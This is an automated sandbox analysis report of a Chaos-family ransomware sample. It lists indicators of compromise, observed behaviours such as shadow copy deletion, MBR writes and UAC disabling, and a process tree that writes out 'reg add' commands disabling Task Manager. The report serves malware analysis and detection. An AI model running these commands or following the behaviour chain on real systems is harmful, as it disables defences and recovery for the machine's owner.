Analysis
-
max time kernel
241s -
max time network
218s -
platform
windows11-21h2_x64 -
resource
win11-20240412-en -
resource tags
arch:x64arch:x86image:win11-20240412-enlocale:en-usos:windows11-21h2-x64system -
submitted
15-04-2024 19:41
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://github.com/pankoza2-pl/malwaredatabase-old/blob/main/Covid29-Ransomware/Covid29%20Ransomware.zip
Resource
win11-20240412-en
General
-
Target
https://github.com/pankoza2-pl/malwaredatabase-old/blob/main/Covid29-Ransomware/Covid29%20Ransomware.zip
Malware Config
Signatures
-
Chaos
Ransomware family first seen in June 2021.
-
Chaos Ransomware 4 IoCs
resource yara_rule behavioral1/files/0x000100000002ab1c-412.dat family_chaos behavioral1/memory/1168-420-0x0000000000DB0000-0x0000000000DD0000-memory.dmp family_chaos behavioral1/memory/4660-495-0x0000000000400000-0x00000000005D5000-memory.dmp family_chaos behavioral1/memory/4660-505-0x0000000000400000-0x00000000005D5000-memory.dmp family_chaos -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 2776 bcdedit.exe 4060 bcdedit.exe -
pid Process 3820 wbadmin.exe -
Disables Task Manager via registry modification
-
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.url svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini svchost.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\covid29-is-here.txt svchost.exe -
Executes dropped EXE 4 IoCs
pid Process 2300 mbr.exe 1168 Cov29Cry.exe 4860 svchost.exe 3128 Cov29LockScreen.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/memory/4660-386-0x0000000000400000-0x00000000005D5000-memory.dmp upx behavioral1/memory/4660-495-0x0000000000400000-0x00000000005D5000-memory.dmp upx behavioral1/memory/4660-505-0x0000000000400000-0x00000000005D5000-memory.dmp upx -
Drops desktop.ini file(s) 34 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini svchost.exe File opened for modification C:\Users\Public\Videos\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Music\desktop.ini svchost.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini svchost.exe File opened for modification C:\Users\Admin\Links\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Videos\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini svchost.exe File opened for modification C:\Users\Public\Pictures\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini svchost.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-243033537-3771492294-1461557691-1000\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Documents\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini svchost.exe File opened for modification C:\Users\Public\Documents\desktop.ini svchost.exe File opened for modification C:\Users\Public\Music\desktop.ini svchost.exe File opened for modification C:\Users\Public\Desktop\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Searches\desktop.ini svchost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 5 raw.githubusercontent.com 66 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
description flow ioc stream HTTP URL 32 https://nordvpn.com/what-is-my-ip/ 1 -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 mbr.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-243033537-3771492294-1461557691-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\90b43ib2z.jpg" svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1912 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 900 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133576837193185435" chrome.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-243033537-3771492294-1461557691-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-243033537-3771492294-1461557691-1000_Classes\Local Settings svchost.exe -
Modifies registry key 1 TTPs 7 IoCs
pid Process 4160 reg.exe 4252 reg.exe 4856 reg.exe 1536 reg.exe 2368 reg.exe 1560 reg.exe 4016 reg.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 1424 PING.EXE 132 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4860 svchost.exe -
Suspicious behavior: EnumeratesProcesses 47 IoCs
pid Process 3584 chrome.exe 3584 chrome.exe 1168 Cov29Cry.exe 1168 Cov29Cry.exe 1168 Cov29Cry.exe 1168 Cov29Cry.exe 1168 Cov29Cry.exe 1168 Cov29Cry.exe 1168 Cov29Cry.exe 1168 Cov29Cry.exe 1168 Cov29Cry.exe 1168 Cov29Cry.exe 1168 Cov29Cry.exe 1168 Cov29Cry.exe 1168 Cov29Cry.exe 1168 Cov29Cry.exe 1168 Cov29Cry.exe 1168 Cov29Cry.exe 1168 Cov29Cry.exe 1168 Cov29Cry.exe 1168 Cov29Cry.exe 1168 Cov29Cry.exe 1168 Cov29Cry.exe 1168 Cov29Cry.exe 4860 svchost.exe 4860 svchost.exe 4860 svchost.exe 4860 svchost.exe 4860 svchost.exe 4860 svchost.exe 4860 svchost.exe 4860 svchost.exe 4860 svchost.exe 4860 svchost.exe 4860 svchost.exe 4860 svchost.exe 4860 svchost.exe 4860 svchost.exe 4860 svchost.exe 4860 svchost.exe 4860 svchost.exe 4860 svchost.exe 4860 svchost.exe 4860 svchost.exe 4860 svchost.exe 4860 svchost.exe 4860 svchost.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
pid Process 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 3584 chrome.exe Token: SeCreatePagefilePrivilege 3584 chrome.exe Token: SeShutdownPrivilege 3584 chrome.exe Token: SeCreatePagefilePrivilege 3584 chrome.exe Token: SeShutdownPrivilege 3584 chrome.exe Token: SeCreatePagefilePrivilege 3584 chrome.exe Token: SeShutdownPrivilege 3584 chrome.exe Token: SeCreatePagefilePrivilege 3584 chrome.exe Token: SeShutdownPrivilege 3584 chrome.exe Token: SeCreatePagefilePrivilege 3584 chrome.exe Token: SeShutdownPrivilege 3584 chrome.exe Token: SeCreatePagefilePrivilege 3584 chrome.exe Token: SeShutdownPrivilege 3584 chrome.exe Token: SeCreatePagefilePrivilege 3584 chrome.exe Token: SeShutdownPrivilege 3584 chrome.exe Token: SeCreatePagefilePrivilege 3584 chrome.exe Token: SeShutdownPrivilege 3584 chrome.exe Token: SeCreatePagefilePrivilege 3584 chrome.exe Token: SeShutdownPrivilege 3584 chrome.exe Token: SeCreatePagefilePrivilege 3584 chrome.exe Token: SeShutdownPrivilege 3584 chrome.exe Token: SeCreatePagefilePrivilege 3584 chrome.exe Token: SeShutdownPrivilege 3584 chrome.exe Token: SeCreatePagefilePrivilege 3584 chrome.exe Token: SeShutdownPrivilege 3584 chrome.exe Token: SeCreatePagefilePrivilege 3584 chrome.exe Token: SeShutdownPrivilege 3584 chrome.exe Token: SeCreatePagefilePrivilege 3584 chrome.exe Token: SeShutdownPrivilege 3584 chrome.exe Token: SeCreatePagefilePrivilege 3584 chrome.exe Token: SeShutdownPrivilege 3584 chrome.exe Token: SeCreatePagefilePrivilege 3584 chrome.exe Token: SeShutdownPrivilege 3584 chrome.exe Token: SeCreatePagefilePrivilege 3584 chrome.exe Token: SeShutdownPrivilege 3584 chrome.exe Token: SeCreatePagefilePrivilege 3584 chrome.exe Token: SeShutdownPrivilege 3584 chrome.exe Token: SeCreatePagefilePrivilege 3584 chrome.exe Token: SeShutdownPrivilege 3584 chrome.exe Token: SeCreatePagefilePrivilege 3584 chrome.exe Token: SeShutdownPrivilege 3584 chrome.exe Token: SeCreatePagefilePrivilege 3584 chrome.exe Token: SeShutdownPrivilege 3584 chrome.exe Token: SeCreatePagefilePrivilege 3584 chrome.exe Token: SeShutdownPrivilege 3584 chrome.exe Token: SeCreatePagefilePrivilege 3584 chrome.exe Token: SeShutdownPrivilege 3584 chrome.exe Token: SeCreatePagefilePrivilege 3584 chrome.exe Token: SeShutdownPrivilege 3584 chrome.exe Token: SeCreatePagefilePrivilege 3584 chrome.exe Token: SeShutdownPrivilege 3584 chrome.exe Token: SeCreatePagefilePrivilege 3584 chrome.exe Token: SeShutdownPrivilege 3584 chrome.exe Token: SeCreatePagefilePrivilege 3584 chrome.exe Token: SeShutdownPrivilege 3584 chrome.exe Token: SeCreatePagefilePrivilege 3584 chrome.exe Token: SeShutdownPrivilege 3584 chrome.exe Token: SeCreatePagefilePrivilege 3584 chrome.exe Token: SeShutdownPrivilege 3584 chrome.exe Token: SeCreatePagefilePrivilege 3584 chrome.exe Token: SeShutdownPrivilege 3584 chrome.exe Token: SeCreatePagefilePrivilege 3584 chrome.exe Token: SeShutdownPrivilege 3584 chrome.exe Token: SeCreatePagefilePrivilege 3584 chrome.exe -
Suspicious use of FindShellTrayWindow 34 IoCs
pid Process 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe -
Suspicious use of SendNotifyMessage 12 IoCs
pid Process 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe 3584 chrome.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 2736 PickerHost.exe 3128 Cov29LockScreen.exe 1736 PickerHost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3584 wrote to memory of 2756 3584 chrome.exe 80 PID 3584 wrote to memory of 2756 3584 chrome.exe 80 PID 3584 wrote to memory of 4392 3584 chrome.exe 81 PID 3584 wrote to memory of 4392 3584 chrome.exe 81 PID 3584 wrote to memory of 4392 3584 chrome.exe 81 PID 3584 wrote to memory of 4392 3584 chrome.exe 81 PID 3584 wrote to memory of 4392 3584 chrome.exe 81 PID 3584 wrote to memory of 4392 3584 chrome.exe 81 PID 3584 wrote to memory of 4392 3584 chrome.exe 81 PID 3584 wrote to memory of 4392 3584 chrome.exe 81 PID 3584 wrote to memory of 4392 3584 chrome.exe 81 PID 3584 wrote to memory of 4392 3584 chrome.exe 81 PID 3584 wrote to memory of 4392 3584 chrome.exe 81 PID 3584 wrote to memory of 4392 3584 chrome.exe 81 PID 3584 wrote to memory of 4392 3584 chrome.exe 81 PID 3584 wrote to memory of 4392 3584 chrome.exe 81 PID 3584 wrote to memory of 4392 3584 chrome.exe 81 PID 3584 wrote to memory of 4392 3584 chrome.exe 81 PID 3584 wrote to memory of 4392 3584 chrome.exe 81 PID 3584 wrote to memory of 4392 3584 chrome.exe 81 PID 3584 wrote to memory of 4392 3584 chrome.exe 81 PID 3584 wrote to memory of 4392 3584 chrome.exe 81 PID 3584 wrote to memory of 4392 3584 chrome.exe 81 PID 3584 wrote to memory of 4392 3584 chrome.exe 81 PID 3584 wrote to memory of 4392 3584 chrome.exe 81 PID 3584 wrote to memory of 4392 3584 chrome.exe 81 PID 3584 wrote to memory of 4392 3584 chrome.exe 81 PID 3584 wrote to memory of 4392 3584 chrome.exe 81 PID 3584 wrote to memory of 4392 3584 chrome.exe 81 PID 3584 wrote to memory of 4392 3584 chrome.exe 81 PID 3584 wrote to memory of 4392 3584 chrome.exe 81 PID 3584 wrote to memory of 4392 3584 chrome.exe 81 PID 3584 wrote to memory of 4392 3584 chrome.exe 81 PID 3584 wrote to memory of 4612 3584 chrome.exe 82 PID 3584 wrote to memory of 4612 3584 chrome.exe 82 PID 3584 wrote to memory of 2936 3584 chrome.exe 83 PID 3584 wrote to memory of 2936 3584 chrome.exe 83 PID 3584 wrote to memory of 2936 3584 chrome.exe 83 PID 3584 wrote to memory of 2936 3584 chrome.exe 83 PID 3584 wrote to memory of 2936 3584 chrome.exe 83 PID 3584 wrote to memory of 2936 3584 chrome.exe 83 PID 3584 wrote to memory of 2936 3584 chrome.exe 83 PID 3584 wrote to memory of 2936 3584 chrome.exe 83 PID 3584 wrote to memory of 2936 3584 chrome.exe 83 PID 3584 wrote to memory of 2936 3584 chrome.exe 83 PID 3584 wrote to memory of 2936 3584 chrome.exe 83 PID 3584 wrote to memory of 2936 3584 chrome.exe 83 PID 3584 wrote to memory of 2936 3584 chrome.exe 83 PID 3584 wrote to memory of 2936 3584 chrome.exe 83 PID 3584 wrote to memory of 2936 3584 chrome.exe 83 PID 3584 wrote to memory of 2936 3584 chrome.exe 83 PID 3584 wrote to memory of 2936 3584 chrome.exe 83 PID 3584 wrote to memory of 2936 3584 chrome.exe 83 PID 3584 wrote to memory of 2936 3584 chrome.exe 83 PID 3584 wrote to memory of 2936 3584 chrome.exe 83 PID 3584 wrote to memory of 2936 3584 chrome.exe 83 PID 3584 wrote to memory of 2936 3584 chrome.exe 83 PID 3584 wrote to memory of 2936 3584 chrome.exe 83 PID 3584 wrote to memory of 2936 3584 chrome.exe 83 PID 3584 wrote to memory of 2936 3584 chrome.exe 83 PID 3584 wrote to memory of 2936 3584 chrome.exe 83 PID 3584 wrote to memory of 2936 3584 chrome.exe 83 PID 3584 wrote to memory of 2936 3584 chrome.exe 83 PID 3584 wrote to memory of 2936 3584 chrome.exe 83 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/pankoza2-pl/malwaredatabase-old/blob/main/Covid29-Ransomware/Covid29%20Ransomware.zip1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3584 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xe0,0x10c,0x7ff962c9ab58,0x7ff962c9ab68,0x7ff962c9ab782⤵PID:2756
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1632 --field-trial-handle=1800,i,10870565550054737949,15075787981835602537,131072 /prefetch:22⤵PID:4392
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1800,i,10870565550054737949,15075787981835602537,131072 /prefetch:82⤵PID:4612
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2152 --field-trial-handle=1800,i,10870565550054737949,15075787981835602537,131072 /prefetch:82⤵PID:2936
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3032 --field-trial-handle=1800,i,10870565550054737949,15075787981835602537,131072 /prefetch:12⤵PID:3472
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3064 --field-trial-handle=1800,i,10870565550054737949,15075787981835602537,131072 /prefetch:12⤵PID:3324
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4056 --field-trial-handle=1800,i,10870565550054737949,15075787981835602537,131072 /prefetch:12⤵PID:4496
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4348 --field-trial-handle=1800,i,10870565550054737949,15075787981835602537,131072 /prefetch:82⤵PID:2332
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4488 --field-trial-handle=1800,i,10870565550054737949,15075787981835602537,131072 /prefetch:12⤵PID:1964
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4680 --field-trial-handle=1800,i,10870565550054737949,15075787981835602537,131072 /prefetch:82⤵PID:5076
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4816 --field-trial-handle=1800,i,10870565550054737949,15075787981835602537,131072 /prefetch:82⤵PID:2736
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4984 --field-trial-handle=1800,i,10870565550054737949,15075787981835602537,131072 /prefetch:82⤵PID:492
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4912 --field-trial-handle=1800,i,10870565550054737949,15075787981835602537,131072 /prefetch:12⤵PID:860
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3440 --field-trial-handle=1800,i,10870565550054737949,15075787981835602537,131072 /prefetch:82⤵PID:5028
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4728 --field-trial-handle=1800,i,10870565550054737949,15075787981835602537,131072 /prefetch:82⤵PID:3616
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=4188 --field-trial-handle=1800,i,10870565550054737949,15075787981835602537,131072 /prefetch:12⤵PID:4860
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=4924 --field-trial-handle=1800,i,10870565550054737949,15075787981835602537,131072 /prefetch:12⤵PID:1872
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=4736 --field-trial-handle=1800,i,10870565550054737949,15075787981835602537,131072 /prefetch:12⤵PID:2752
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=3164 --field-trial-handle=1800,i,10870565550054737949,15075787981835602537,131072 /prefetch:12⤵PID:888
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5264 --field-trial-handle=1800,i,10870565550054737949,15075787981835602537,131072 /prefetch:82⤵PID:760
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1480 --field-trial-handle=1800,i,10870565550054737949,15075787981835602537,131072 /prefetch:22⤵PID:4368
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=4944 --field-trial-handle=1800,i,10870565550054737949,15075787981835602537,131072 /prefetch:12⤵PID:3240
-
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵PID:1796
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2148
-
C:\Users\Admin\Downloads\Covid29 Ransomware\TrojanRansomCovid29.exe"C:\Users\Admin\Downloads\Covid29 Ransomware\TrojanRansomCovid29.exe"1⤵PID:4660
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5A6F.tmp\TrojanRansomCovid29.bat" "2⤵
- Modifies registry class
PID:4380 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5A6F.tmp\fakeerror.vbs"3⤵PID:408
-
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 23⤵
- Runs ping.exe
PID:1424
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
- Modifies registry key
PID:2368
-
-
C:\Windows\SysWOW64\reg.exereg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f3⤵
- Modifies registry key
PID:1560
-
-
